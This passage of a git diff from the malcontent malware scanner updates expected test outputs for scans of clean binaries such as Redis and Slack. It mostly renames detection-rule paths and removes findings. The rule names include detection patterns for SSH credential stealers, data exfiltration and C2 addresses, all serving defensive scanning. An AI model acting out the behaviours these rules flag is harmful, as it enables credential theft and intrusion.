[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | -| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | -| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | -| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | -| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | -| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | -| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | -| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | -| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | -| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | -| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | -| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | -| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | -| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|----------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [c2/addr/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | +| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | +| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | +| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | +| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | +| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | +| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | +| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | +| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | +| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | +| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | +| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | +| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | +| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | +| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | +| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | +| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple index 361c13843..2b81daa5e 100644 --- a/tests/linux/clean/rules.json.simple +++ b/tests/linux/clean/rules.json.simple @@ -38,7 +38,6 @@ exec/system_controls/apparmor: medium exec/tty/pathname: medium exfil: medium exfil/stealer/linux_server: high -exfil/stealer/ssh: high fs/fifo_create: low fs/file/times_set: medium fs/lock_update: low diff --git a/tests/linux/clean/searchindex.json.simple b/tests/linux/clean/searchindex.json.simple index 707fc77c4..c4fa65476 100644 --- a/tests/linux/clean/searchindex.json.simple +++ b/tests/linux/clean/searchindex.json.simple @@ -12,7 +12,7 @@ data/random/insecure: low discover/components/docker: medium discover/system/platform: low discover/system/sysinfo: medium -evasion/hidden_paths/chdir_unusual: medium +evasion/covert_location/chdir_unusual: medium evasion/hide_artifacts/system_directories: medium exec/install_additional/package_install: medium exec/install_additional/pip_install: medium diff --git a/tests/linux/clean/securitySolution.chunk.9.js.simple b/tests/linux/clean/securitySolution.chunk.9.js.simple index 073ed4452..6285b1a24 100644 --- a/tests/linux/clean/securitySolution.chunk.9.js.simple +++ b/tests/linux/clean/securitySolution.chunk.9.js.simple @@ -35,7 +35,6 @@ 3P/threat_hunting/traitor: medium 3P/threat_hunting/wpscan: medium anti-static/obfuscation/js/char_codes: medium -c2/addr/ip: medium c2/addr/ip_port: medium c2/addr/php: medium c2/addr/url_unusual: high diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md index 84e530930..b94546d85 100644 --- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -28,7 +28,7 @@ | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) | -| MEDIUM | [evasion/hidden_paths/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) | +| MEDIUM | [evasion/covert_location/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) | | MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | 